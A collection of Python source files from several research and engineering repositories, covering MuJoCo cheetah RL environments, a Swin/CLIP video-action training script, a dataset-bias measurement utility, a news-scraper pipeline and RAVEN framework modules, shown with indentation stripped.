'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahHeavyEnv(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_heavy.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
self.joint_list=['bthigh','bshin','bfoot','fthigh','fshin','ffoot']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(6):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
'''delta_theta_bt = np.abs(next_states[2] - states[2])
delta_theta_bs = np.abs(next_states[3] - states[3])
delta_theta_bf = np.abs(next_states[4] - states[4])
delta_theta_ft = np.abs(next_states[5] - states[5])
delta_theta_fs = np.abs(next_states[6] - states[6])
delta_theta_ff = np.abs(next_states[7] - states[7])
energy_bt = np.abs(action[0]) * delta_theta_bt
energy_bs = np.abs(action[1]) * delta_theta_bs
energy_bf = np.abs(action[2]) * delta_theta_bf
energy_ft = np.abs(action[3]) * delta_theta_ft
energy_fs = np.abs(action[4]) * delta_theta_fs
energy_ff = np.abs(action[5]) * delta_theta_ff
energy = energy_bt + energy_bs + energy_bf + energy_ft + energy_fs + energy_ff'''
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class FullCheetahEnv(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='full_cheetah.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
self.joint_list=['bthighL','bshinL','bfootL','fthighL','fshinL','ffootL',
'bthighR', 'bshinR', 'bfootR', 'fthighR', 'fshinR', 'ffootR']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
'''delta_theta_bt = np.abs(next_states[2] - states[2])
delta_theta_bs = np.abs(next_states[3] - states[3])
delta_theta_bf = np.abs(next_states[4] - states[4])
delta_theta_ft = np.abs(next_states[5] - states[5])
delta_theta_fs = np.abs(next_states[6] - states[6])
delta_theta_ff = np.abs(next_states[7] - states[7])
energy_bt = np.abs(action[0]) * delta_theta_bt
energy_bs = np.abs(action[1]) * delta_theta_bs
energy_bf = np.abs(action[2]) * delta_theta_bf
energy_ft = np.abs(action[3]) * delta_theta_ft
energy_fs = np.abs(action[4]) * delta_theta_fs
energy_ff = np.abs(action[5]) * delta_theta_ff
energy = energy_bt + energy_bs + energy_bf + energy_ft + energy_fs + energy_ff'''
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
```
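All three cheetah variants above use the same per-step energy penalty: the absolute action applied to each joint times the absolute change in that joint's angle, summed over joints and scaled by `energy_weights`. A standalone sketch of that term (the function name and arguments are illustrative, not part of the environment code):

```python
import numpy as np

def energy_proxy(action, angles_before, angles_after):
    """Sum over joints of |action_i| * |delta angle_i| for one simulation step."""
    delta = np.abs(np.asarray(angles_after) - np.asarray(angles_before))
    return float(np.sum(np.abs(np.asarray(action)) * delta))

# The environments then shape the reward as:
#   reward = forward_reward - ctrl_cost - energy_weights * energy_proxy(...)
```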
#### File: softlearning/models/feedforward.py
```python
import tensorflow as tf
import tensorflow_probability as tfp
tfd = tfp.distributions
from softlearning.utils.keras import PicklableKerasModel
SCALE_DIAG_MIN_MAX = (-20, 2)
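# sampling implements the reparameterization trick with an implicit zero mean:
# it draws eps ~ N(0, I) and scales it by exp(0.5 * log_var).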
def sampling(args):
z_log_var = args
batch = tf.keras.backend.shape(z_log_var)[0]
dim = tf.keras.backend.int_shape(z_log_var)[1]
# by default, random_normal has mean=0 and std=1.0
epsilon = tf.keras.backend.random_normal(shape=(batch, dim))
return tf.keras.backend.exp(0.5 * z_log_var) * epsilon
def feedforward_model(input_shapes,
output_size,
hidden_layer_sizes,
activation='relu',
output_activation='linear',
preprocessors=None,
name='feedforward_model',
*args,
**kwargs):
inputs = [
tf.keras.layers.Input(shape=input_shape)
for input_shape in input_shapes
]
if preprocessors is None:
preprocessors = (None, ) * len(inputs)
preprocessed_inputs = [
preprocessor(input_) if preprocessor is not None else input_
for preprocessor, input_ in zip(preprocessors, inputs)
]
concatenated = tf.keras.layers.Lambda(
lambda x: tf.concat(x, axis=-1)
)(preprocessed_inputs)
out = concatenated
for units in hidden_layer_sizes:
out = tf.keras.layers.Dense(
units, *args, activation=activation, **kwargs
)(out)
out = tf.keras.layers.Dense(
output_size, *args, activation=output_activation, **kwargs
)(out)
model = PicklableKerasModel(inputs, out, name=name)
return model
``` |
{
"source": "jiazheng-xing/Swin_Multimodal",
"score": 2
} |
#### File: jiazheng-xing/Swin_Multimodal/train_swin.py
```python
import os
from torch._C import import_ir_module
import torch.nn as nn
from datasets import Action_DATASETS
from torch.utils.data import DataLoader
from tqdm import tqdm
import wandb
import argparse
import shutil
from pathlib import Path
import yaml
from dotmap import DotMap
import pprint
from modules.Visual_Prompt_OR import visual_prompt
from utils.KLLoss import KLLoss
from test_swin import validate
from utils.Augmentation import *
from utils.solver_swin import _optimizer, _lr_scheduler
from utils.tools import *
from utils.Text_Prompt import *
from utils.saving import *
from swin.swin_transf import SwinTransformer3D
from swin.pretrain_load import inflate_weights
class TextCLIP(nn.Module):
def __init__(self, model) :
super(TextCLIP, self).__init__()
self.model = model
def forward(self,text):
return self.model.encode_text(text)
class ImageCLIP(nn.Module):
def __init__(self, model) :
super(ImageCLIP, self).__init__()
self.model = model
def forward(self,image):
return self.model.encode_image(image)
def main():
global args, best_prec1
global global_step
parser = argparse.ArgumentParser()
parser.add_argument('--config', '-cfg', default='')
parser.add_argument('--log_time', default='')
args = parser.parse_args()
with open(args.config, 'r') as f:
config = yaml.load(f, Loader=yaml.FullLoader )
working_dir = os.path.join('./exp', config['network']['type'], config['network']['arch'], config['data']['dataset'], args.log_time)
wandb.init(project=config['network']['type'],name='{}_{}_{}_{}'.format(args.log_time,config['network']['type'], config['network']['arch'], config['data']['dataset']))
print('-' * 80)
print(' ' * 20, "working dir: {}".format(working_dir))
print('-' * 80)
print('-' * 80)
print(' ' * 30, "Config")
pp = pprint.PrettyPrinter(indent=4)
pp.pprint(config)
print('-' * 80)
config = DotMap(config)
Path(working_dir).mkdir(parents=True, exist_ok=True)
shutil.copy(args.config, working_dir)
shutil.copy('train.py', working_dir)
device = "cuda" if torch.cuda.is_available() else "cpu" # If using GPU then use mixed precision training.
model, clip_state_dict = clip.load(config.network.arch,device=device,jit=False, tsm=config.network.tsm, T=config.data.num_segments,dropout=config.network.drop_out, emb_dropout=config.network.emb_dropout,pretrain=config.network.init, joint = config.network.joint) #Must set jit=False for training ViT-B/32
swin_model = SwinTransformer3D(patch_size = tuple(config.swin_model.patch_size), drop_path_rate = config.swin_model.drop_path_rate, in_channels = config.swin_model.in_channels, depths = tuple(config.swin_model.depths), embed_dim =config.swin_model.embed_dim, num_heads= tuple(config.swin_model.num_heads))
# swin_model = SwinTransformer3D()
transform_train = get_augmentation(True,config)
transform_val = get_augmentation(False,config)
if config.data.randaug.N > 0:
transform_train = randAugment(transform_train, config)
print('train transforms: {}'.format(transform_train.transforms))
print('val transforms: {}'.format(transform_val.transforms))
model_text = TextCLIP(model)
model_image = ImageCLIP(model)
swin_model = torch.nn.DataParallel(swin_model).cuda()
model_text = torch.nn.DataParallel(model_text).cuda()
model_image = torch.nn.DataParallel(model_image).cuda()
wandb.watch(swin_model)
wandb.watch(model)
    train_data = Action_DATASETS(config.data.train_list,config.data.label_list,num_segments=config.data.num_segments,image_tmpl=config.data.image_tmpl,random_shift=config.data.random_shift,
transform=transform_train)
train_loader = DataLoader(train_data,batch_size=config.data.batch_size,num_workers=config.data.workers,shuffle=True,pin_memory=False,drop_last=True)
val_data = Action_DATASETS(config.data.val_list,config.data.label_list, random_shift=config.data.random_shift,num_segments=config.data.num_segments,image_tmpl=config.data.image_tmpl,
transform=transform_val)
val_loader = DataLoader(val_data,batch_size=config.data.batch_size,num_workers=config.data.workers,shuffle=False,pin_memory=False,drop_last=True)
# if device == "cpu":
model_text.float()
model_image.float()
swin_model.float()
# else :
# clip.model.convert_weights(model_text) # Actually this line is unnecessary since clip by default already on float16
# clip.model.convert_weights(model_image)
# clip.model.convert_weights(swin_model)
loss_img = KLLoss()
loss_txt = KLLoss()
start_epoch = config.solver.start_epoch
if config.pretrain:
if os.path.isfile(config.pretrain):
print(("=> loading checkpoint '{}'".format(config.pretrain)))
checkpoint = torch.load(config.pretrain)
model.load_state_dict(checkpoint['model_state_dict'])
del checkpoint
else:
print(("=> no checkpoint found at '{}'".format(config.resume)))
if config.swin_model.pretrain:
if config.swin_model.pretrain_type == '2D_pretrain':
pretrained_state_dict = inflate_weights(config.swin_model.pretrain,swin_model.module, tuple(config.swin_model.window_size), tuple(config.swin_model.patch_size))
swin_model.module.load_state_dict(pretrained_state_dict, strict=False)
del pretrained_state_dict
else:
unexpected_keys = ['cls_head.fc_cls.weight', 'cls_head.fc_cls.bias']
pretrained_state_dict = torch.load(config.swin_model.pretrain, map_location='cpu')
            pretrained_state_dict = {k: v for k, v in pretrained_state_dict['state_dict'].items() if k not in unexpected_keys} # needed during training
pretrained_state_dict = {k[9:]: v for k, v in pretrained_state_dict.items()}
swin_model.module.load_state_dict(pretrained_state_dict, strict=False)
del pretrained_state_dict
print("---------------------------------------------------swin_model_load_succes----------------------------------------------")
# print("fix_text_parameters")
if config.resume:
if os.path.isfile(config.resume):
print(("=> loading checkpoint '{}'".format(config.resume)))
checkpoint = torch.load(config.resume)
model.load_state_dict(checkpoint['model_state_dict'])
swin_model.load_state_dict(checkpoint['swin_model'])
start_epoch = checkpoint['epoch']
print(("=> loaded checkpoint '{}' (epoch {})"
.format(config.resume, start_epoch)))
del checkpoint
else:
print(("=> no checkpoint found at '{}'".format(config.pretrain)))
classes, num_text_aug, text_dict = text_prompt(train_data)
optimizer = _optimizer(config, model, swin_model)
lr_scheduler = _lr_scheduler(config, optimizer)
best_prec1 = 0.0
if config.solver.evaluate:
        prec1 = validate(start_epoch, val_loader, classes, device, model, swin_model, config, num_text_aug)
return
# for k,v in model.named_parameters():
# print('{}: {}'.format(k, v.requires_grad)) #text_encoder weight fixed
for epoch in range(start_epoch, config.solver.epochs):
model_image.train()
model_text.train()
swin_model.train()
for kkk,(images,list_id) in enumerate(tqdm(train_loader)):
if config.solver.type != 'monitor':
if (kkk+1) == 1 or (kkk+1) % 10 == 0:
lr_scheduler.step(epoch + kkk / len(train_loader))
optimizer.zero_grad()
images = images.view((-1,config.data.num_segments,3)+images.size()[-2:])
b,t,c,h,w = images.size()
text_id = numpy.random.randint(num_text_aug,size=len(list_id))
texts = torch.stack([text_dict[j][i,:] for i,j in zip(list_id,text_id)])
# images= images.to(device).view(-1,c,h,w ) # omit the Image.fromarray if the images already in PIL format, change this line to images=list_image if using preprocess inside the dataset class
texts = texts.to(device)
images = images.to(device).permute(0,2,1,3,4)
# image_embedding = model_image(images)
image_embedding = swin_model(images)
text_embedding = model_text(texts)
# print("*"*100)
# print("text_embedding:{}".format(text_embedding.shape))
# print("*"*100)
if config.network.fix_text:
text_embedding.detach_()
logit_scale = model.logit_scale.exp()
logits_per_image, logits_per_text = create_logits(image_embedding,text_embedding,logit_scale)
ground_truth = torch.tensor(gen_label(list_id),dtype=image_embedding.dtype,device=device)
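            # CLIP-style symmetric objective: KL losses on the image->text and
            # text->image similarity logits, matched against pairwise targets
            # that gen_label builds from the class ids in list_id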
loss_imgs = loss_img(logits_per_image,ground_truth)
loss_texts = loss_txt(logits_per_text,ground_truth)
total_loss = (loss_imgs + loss_texts)/2
wandb.log({"train_total_loss": total_loss})
wandb.log({"train_loss_imgs": loss_imgs})
wandb.log({"train_loss_texts": loss_texts})
total_loss.backward()
optimizer.step()
# if device == "cpu":
# optimizer.step()
# else:
# convert_models_to_fp32(model)
# convert_models_to_fp32(swin_model)
# optimizer.step()
# clip.model.convert_weights(model)
# clip.model.convert_weights(swin_model)
if epoch % config.logging.eval_freq == 0: # and epoch>0
prec1 = validate(epoch,val_loader, classes, device, model,swin_model, config,num_text_aug)
is_best = prec1 > best_prec1
best_prec1 = max(prec1, best_prec1)
print('Testing: {}/{}'.format(prec1,best_prec1))
print('Saving:')
filename = "{}/last_model.pt".format(working_dir)
epoch_saving(epoch, model, swin_model, optimizer, filename)
if is_best:
best_saving(working_dir, epoch, model, swin_model, optimizer)
if __name__ == '__main__':
main()
``` |
{
"source": "jiazhi412/Dataset-REPAIR",
"score": 2
} |
#### File: Dataset-REPAIR/utils/measure.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from tqdm import tqdm
def train(loader, epochs, model, optimizer, scheduler=None):
model.train()
with tqdm(range(1, epochs + 1)) as pbar:
for _ in pbar:
losses = []
corrects = 0
if scheduler is not None:
scheduler.step()
for x, y in loader:
out = model(x)
loss = F.cross_entropy(out, y)
losses.append(loss.item())
corrects += out.max(1)[1].eq(y).sum().item()
optimizer.zero_grad()
loss.backward()
optimizer.step()
loss = sum(losses) / len(losses)
acc = 100 * corrects / len(loader.dataset)
pbar.set_postfix(loss='%.3f' % loss, acc='%.2f%%' % acc)
return loss, acc
def measure_bias(train_loader, test_loader, feat_fn, feat_dim, opt, verbose=True):
epochs = opt['epochs']
lr = opt['lr']
device = opt['device']
# class counts
train_labels = torch.tensor([data[1] for data in train_loader.dataset]).long().to(device)
n_cls = int(train_labels.max()) + 1
# create models
model = nn.Linear(feat_dim, n_cls).to(device)
optimizer = optim.Adam(model.parameters(), lr=lr)
scheduler = optim.lr_scheduler.StepLR(optimizer, 15, 0.1)
# training
model.train()
pbar = tqdm(range(1, epochs + 1)) if verbose else range(1, epochs + 1)
for _ in pbar:
losses = []
corrects = 0
scheduler.step()
for x, y in train_loader:
x, y = x.to(device), y.to(device)
# linear classifier
color = feat_fn(x)
out = model(color)
loss = F.cross_entropy(out, y)
losses.append(loss.item())
corrects += out.max(1)[1].eq(y).sum().item()
optimizer.zero_grad()
loss.backward()
optimizer.step()
loss = sum(losses) / len(losses)
acc = 100 * corrects / len(train_loader.dataset)
if verbose:
pbar.set_postfix(loss='%.3f' % loss, acc='%.2f%%' % acc)
# testing
model.eval()
with torch.no_grad():
losses = []
corrects = 0
for x, y in test_loader:
x, y = x.to(device), y.to(device)
x = x.view(x.size(0), x.size(1), -1)
out = model(feat_fn(x))
loss = F.cross_entropy(out, y)
losses.append(loss.item())
corrects += out.max(1)[1].eq(y).sum().item()
loss = sum(losses) / len(losses)
acc = 100 * corrects / len(test_loader.dataset)
# measure bias
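    # bias = 1 - H(y|feature)/H(y): the probe's test cross-entropy estimates the
    # conditional entropy, so bias approaches 1 when the feature alone predicts
    # the label and 0 when it carries no information about it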
cls_count = torch.stack([train_labels == c for c in range(n_cls)]).sum(1).float()
cls_w = cls_count[cls_count > 0] / cls_count.sum()
entropy = -(cls_w * cls_w.log()).sum().item()
bias = 1 - loss / entropy
return bias, loss, acc, entropy
def measure_generalization(train_loader, test_loaders, model, opt):
epochs = opt['epochs']
lr = opt['lr']
device = opt['device']
# create models
model = model.to(device)
optimizer = optim.Adam(model.parameters(), lr=lr)
scheduler = optim.lr_scheduler.StepLR(optimizer, 20, 0.1)
# training
train(train_loader, epochs, model, optimizer, scheduler)
# testing
model.eval()
test_losses = []
test_accs = []
with torch.no_grad():
for k, loader in enumerate(test_loaders):
losses = []
corrects = 0
for x, y in loader:
x, y = x.to(device), y.to(device)
out = model(x)
loss = F.cross_entropy(out, y)
losses.append(loss.item())
corrects += out.max(1)[1].eq(y).sum().item()
loss = sum(losses) / len(losses)
test_losses.append(loss)
acc = corrects / len(loader.dataset)
test_accs.append(acc)
return test_accs
``` |
{
"source": "jia-zh/News-Spider",
"score": 3
} |
#### File: News-Spider/NewsSpider/pipelines.py
```python
import os
import re
class NewsspiderPipeline(object):
def __init__(self):
root_path = '/'.join(os.path.abspath(__file__).split('/')[:-2])
self.news_path = os.path.join(root_path, 'news')
if not os.path.exists(self.news_path):
os.makedirs(self.news_path)
self.rep = {'<':'', '>':'', '/':'', '\\':'', '|':'', ':':'', '"':'', '*':'', '?':'', ' ':'', '-':'', '\n':'','\r':''}
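        # escape the keys and compile them into a single regex so every illegal
        # filename character can be replaced in one pass by self.pattern.sub below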
self.rep = dict((re.escape(k), v) for k, v in self.rep.items())
self.pattern = re.compile("|".join(self.rep.keys()))
    '''Process the data stream'''
def process_item(self, item, spider):
keyword = item['keyword']
event_path = os.path.join(self.news_path, keyword)
if not os.path.exists(event_path):
os.makedirs(event_path)
filename = os.path.join(event_path,
self.pattern.sub(lambda m: self.rep[re.escape(m.group(0))], item['news_time'])[0:12] + '@' +
self.pattern.sub(lambda m: self.rep[re.escape(m.group(0))], item['news_title']))
if len(filename) > 200:
filename = filename[0:200] + "..."
with open(filename, "w", encoding="utf-8") as f:
f.write("标题:{0}\n".format(item['news_title']))
f.write("URL:{0}\n".format(item['news_url']))
f.write("发布时间:{0}\n".format(item['news_time']))
f.write("正文:{0}\n".format(item['news_content']))
f.close()
``` |
{
"source": "JiaZhou-PU/raven",
"score": 2
} |
#### File: framework/OutStreams/FilePrint.py
```python
import os
from utils import InputData, InputTypes
import DataObjects
from .OutStreamBase import OutStreamBase
from ClassProperty import ClassProperty
class FilePrint(OutStreamBase):
"""
Class for managing the printing of files as an output stream.
"""
## Promoting these to static class variables, since they will not alter from
## object to object. The use of the @ClassProperty with only a getter makes
## the variables immutable (so long as no one touches the internally stored
## "_"-prefixed), so other objects don't accidentally modify them.
_availableOutStreamTypes = ['csv', 'xml']
@ClassProperty
def availableOutStreamTypes(cls):
"""
A class level constant that tells developers what outstreams are
available from this class
@ In, cls, the OutStreams class of which this object will be a type
"""
return cls._availableOutStreamTypes
@classmethod
def getInputSpecification(cls):
"""
Method to get a reference to a class that specifies the input data for class "cls".
@ In, cls, the class for which we are retrieving the specification
@ Out, inputSpecification, InputData.ParameterInput, class to use for specifying the input of cls.
"""
spec = OutStreamBase.getInputSpecification()
types = InputTypes.makeEnumType('FilePrintTypes', 'FilePrintTypes', cls._availableOutStreamTypes)
spec.addSub(InputData.parameterInputFactory('type', contentType=types))
spec.addSub(InputData.parameterInputFactory('source', contentType=InputTypes.StringListType))
spec.addSub(InputData.parameterInputFactory('what', contentType=InputTypes.StringListType))
spec.addSub(InputData.parameterInputFactory('filename', contentType=InputTypes.StringType))
spec.addSub(InputData.parameterInputFactory('clusterLabel', contentType=InputTypes.StringType))
# these are in user manual or code, but don't appear to be used/documented ...
# spec.addSub(InputData.parameterInputFactory('target', contentType=InputTypes.StringListType))
# spec.addSub(InputData.parameterInputFactory('directory',
# contentType=InputTypes.StringListType))
return spec
def __init__(self):
"""
Constructor
@ In, None
@ Out, None
"""
OutStreamBase.__init__(self)
self.type = 'OutStreamFilePrint'
self.printTag = 'OUTSTREAM PRINT'
self.sourceName = []
self.sourceData = None
self.what = None
# dictionary of what indices have already been printed, so we don't duplicate writing efforts
self.indexPrinted = {} # keys are filenames, which should be reset at the end of every step
self.subDirectory = None # subdirectory where to store the outputs
def _handleInput(self, spec):
"""
Loads the input specs for this object.
@ In, spec, InputData.ParameterInput, input specifications
@ Out, None
"""
typ = spec.findFirst('type')
if typ is None:
self.raiseAnError(IOError, f'OutStream.Print "{self.name}" is missing the "type" node!')
self.options['type'] = typ.value
source = spec.findFirst('source')
if source is None:
self.raiseAnError(IOError, f'OutStream.Print "{self.name}" is missing the "source" node!')
self.sourceName = source.value
# FIXME this is a terrible name
what = spec.findFirst('what')
if what is not None:
self.what = what.value # [x.lower() for x in what.value]
fname = spec.findFirst('filename')
if fname is not None:
self.filename = fname.value
cluster = spec.findFirst('clusterLabel')
if cluster is not None:
self.options['clusterLabel'] = cluster.value
# checks
if self.options['type'] == 'csv' and self.what is not None:
for target in [x.lower() for x in self.what]:
if not target.startswith(('input', 'output', 'metadata')):
self.raiseAnError(IOError, f'<what> requests must start with "input", "output", or "metadata"! See OutStream.Print "{self.name}"')
def localGetInitParams(self):
"""
This method is called from the base function. It retrieves the initial
      characteristic params that need to be seen by the whole environment
@ In, None
@ Out, paramDict, dict, dictionary containing the parameter names as keys
and each parameter's initial value as the dictionary values
"""
paramDict = {}
for index in range(len(self.sourceName)):
paramDict['Source Name ' + str(index) + ' :'] = self.sourceName[index]
if self.what:
for index, var in enumerate(self.what):
paramDict['Variable Name ' + str(index) + ' :'] = var
return paramDict
def initialize(self, inDict):
"""
Function to initialize the OutStream. It basically looks for the "data"
object and links it to the system
@ In, inDict, dict, It contains all the Object are going to be used in the
current step. The sources are searched into this.
@ Out, None
"""
# the linking to the source is performed in the base class initialize method
OutStreamBase.initialize(self, inDict)
def addOutput(self):
"""
Calls output functions on desired instances in order to print out the
linked dataObjects
@ In, None
@ Out, None
"""
dictOptions = {}
dictOptions['filenameroot'] = self.name
if len(self.filename) > 0:
dictOptions['filenameroot'] = self.filename
if self.subDirectory is not None:
dictOptions['filenameroot'] = os.path.join(self.subDirectory,dictOptions['filenameroot'])
if self.what:
dictOptions['what'] = self.what
if 'target' in self.options.keys():
dictOptions['target'] = self.options['target']
for index in range(len(self.sourceName)):
try:
empty = self.sourceData[index].isEmpty
except AttributeError:
empty = False
if self.options['type'] == 'csv':
filename = dictOptions['filenameroot']
rlzIndex = self.indexPrinted.get(filename,0)
dictOptions['firstIndex'] = rlzIndex
# clusterLabel lets the user print a point set as if it were a history, with input decided by clusterLabel
if 'clusterLabel' in self.options:
if type(self.sourceData[index]).__name__ != 'PointSet':
self.raiseAWarning('Label clustering currently only works for PointSet data objects! Skipping for',self.sourceData[index].name)
else:
dictOptions['clusterLabel'] = self.options['clusterLabel']
try:
rlzIndex = self.sourceData[index].write(filename,style='CSV',**dictOptions)
except AttributeError:
self.raiseAnError(NotImplementedError, 'No implementation for source type', self.sourceData[index].type, 'and output type "'+str(self.options['type'].strip())+'"!')
finally:
self.indexPrinted[filename] = rlzIndex
elif self.options['type'] == 'xml':
try:
self.sourceData[index].printXML(dictOptions)
except AttributeError:
self.raiseAnError(NotImplementedError, 'No implementation for source type', self.sourceData[index].type, 'and output type "'+str(self.options['type'].strip())+'"!')
def finalize(self):
"""
End-of-step operations for cleanup.
@ In, None
@ Out, None
"""
# clear history of printed realizations; start fresh for next step
self.indexPrinted = {}
```
#### File: raven/framework/PostProcessorInterfaces.py
```python
from __future__ import division, print_function, unicode_literals, absolute_import
#End compatibility block for Python 3----------------------------------------------------------------
#External Modules------------------------------------------------------------------------------------
import os
from glob import glob
import inspect
#External Modules End--------------------------------------------------------------------------------
#Internal Modules------------------------------------------------------------------------------------
from utils import utils
#Internal Modules End--------------------------------------------------------------------------------
__moduleInterfaceList = []
startDir = os.path.join(os.path.dirname(__file__),'PostProcessorFunctions')
for dirr,_,_ in os.walk(startDir):
__moduleInterfaceList.extend(glob(os.path.join(dirr,"*.py")))
utils.add_path(dirr)
__moduleImportedList = []
'''
Interfaced Post Processor
Here all the Interfaced Post-Processors located in the raven/framework/PostProcessorFunctions folder are parsed and their instances are returned
'''
__base = 'PostProcessor'
__interFaceDict = {}
for moduleIndex in range(len(__moduleInterfaceList)):
if 'class' in open(__moduleInterfaceList[moduleIndex]).read():
__moduleImportedList.append(utils.importFromPath(__moduleInterfaceList[moduleIndex],False))
for key,modClass in inspect.getmembers(__moduleImportedList[-1], inspect.isclass):
# in this way we can get all the class methods
classMethods = [method for method in dir(modClass) if callable(getattr(modClass, method))]
if 'run' in classMethods:
__interFaceDict[key] = modClass
__knownTypes = list(__interFaceDict.keys())
def interfaceClasses():
"""
This returns the classes available
@ In, None
@ Out, interfaceClasses, list of classes available
"""
return list(__interFaceDict.values())
def knownTypes():
"""
This function returns the types of interfaced post-processors available
@ In, None,
@ Out, __knownTypes, list, list of recognized post-processors
"""
return __knownTypes
def returnPostProcessorInterface(Type,caller):
"""
This function returns interfaced post-processors interface
@ In, Type, string, type of Interfaced PostProcessor to run
@ In, caller, instance of the PostProcessor class
@ Out, __interFaceDict[Type](), dict, interfaced PostProcessor dictionary
"""
if Type not in knownTypes():
caller.raiseAnError(NameError,'"%s" type unrecognized:' %__base,Type)
return __interFaceDict[Type](caller.messageHandler)
```
#### File: framework/PostProcessors/FTStructure.py
```python
from __future__ import division, print_function, unicode_literals, absolute_import
#Internal Modules---------------------------------------------------------------
import MessageHandler
from utils import utils
from .FTGate import FTGate
from utils import xmlUtils as xmlU
#Internal Modules End-----------------------------------------------------------
#External Modules---------------------------------------------------------------
import numpy as np
import xml.etree.ElementTree as ET
import copy
import itertools
from collections import OrderedDict
#External Modules End-----------------------------------------------------------
class FTStructure(object):
"""
    This is the base class that handles the fault-tree (FT) structure; it is used by both the FTImporter post-processor and the FTModel
"""
def __init__(self, inputs, topEventID):
"""
      Constructor
      @ In, inputs, list, list of file objects containing the fault-tree definition
      @ In, topEventID, string, ID of the top event (gate) whose value is the FT output
      @ Out, None
"""
self.basicEvents = [] # List of Basic events of the FT
self.houseEvents = {} # List of House events of the FT
self.gateList = {} # Dict of Gates of the FT
self.gateID = [] # list of Gates name
self.topEventID = topEventID # ID of the FT output
for fileID in inputs:
faultTree = ET.parse(fileID.getPath() + fileID.getFilename())
